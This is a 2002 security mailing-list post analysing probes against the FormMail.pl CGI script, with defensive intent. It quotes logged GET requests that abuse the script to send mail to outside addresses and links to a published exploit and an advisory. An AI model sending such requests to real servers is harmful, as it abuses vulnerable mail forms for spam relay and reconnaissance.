On Mon, 14 Jan 2002, Turner, Keith wrote: > My guess is one of the following: 1) Someone looking to send spam > through someone else's webserver. (Seems like that would be very > inefficient). 2) Someone looking for a new exploit, maybe testing the > waters for a new worm. 3) Someone looking for a way to "forge" emails. > make it look like it came from an email address of the affected > domain. The email header would go right back to an address in the > "forged" domain. my formail attacks have this general structure: GET /cgi-bin/formmail.pl?email=someone%40aol%2Ecom&subject=hostname%2Edomain%2Ecom%2Fcgi%2Dbin%2Fformail%2Epl&recipient=c0mik%40hotmail%2Ecom&msg=w00t recipients have been: c0mikat_private (msg=w00t) jersyvipsat_private (again, msg=w00t) w00tw00tat_private (yet again, msg=w00t) Heyheyremeberme9at_private (msg=w00t) GUILTYBIZat_private (msg=w00t) i don't know if any of those accounts are valid. those are just in the past 10,000 lines or so from my error logs (i dont use FormMail.pl). the use of 'w00t' suggests a younger element (w00t is L33T and all), doubtful its just simply spam but rather 'hey, this site's got vulnerable cgi-bin stuff'. spawn an xterm using formmail: http://packetstorm.widexs.nl/0007-exploits/formmail-xploit.pl view env vars using formmail: http://packetstorm.widexs.nl/advisories/blackwatchlabs/BWL-00-06.txt but i did find that others have been seeing this same basic pattern: web logs posted on http://icosym-nt.cvut.cz/musage/A2001-12.txt /cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=icosym%2ecvut%2ecz%2fcgi%2dbin%2fformmail%2epl&recipient=nightauditer%40aol%2ecom&msg=w00t /cgi-bin/formmail.pl?recipient=rmitchell9601at_private,&subject=are%20you%20interested%20in%20applying%20your%20skills&email=charresoneeat_private&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl /cgi-bin/formmail.pl?recipient=rmitchell9601at_private,&subject=find%20that%20long%20lost%20friend%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.&email=lcordeeat_private&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl http://www.google.com/search?q=cache:L5KlWd3G3D4C:www.kolobrzeg.pl/stats1169/statslog.20011205+formmail+w00t&hl=en 1Cust129.tnt3.richmond.va.da.uu.net - - [05/Dec/2001:00:10:01 +0100] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Ekolobrzeg%2Epl%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=dreads%40aol%2Ecom&msg=w00t HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 190 "" "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)" etc etc ... formmail + w00t on google brings up a bunch. from a few more lists, more discussion: http://ntbugtraq.net/archive/107/244789 http://citadelle.intrinsec.com/mailing/current/HTML/ml_mobile_code/0487.html hope this helps. its a bit older, and not a highly visible item, but its real. ____________________________ jose nazario joseat_private PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80 PGP key ID 0xFD37F4E5 (pgp.mit.edu) ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Jan 14 2002 - 14:32:00 PST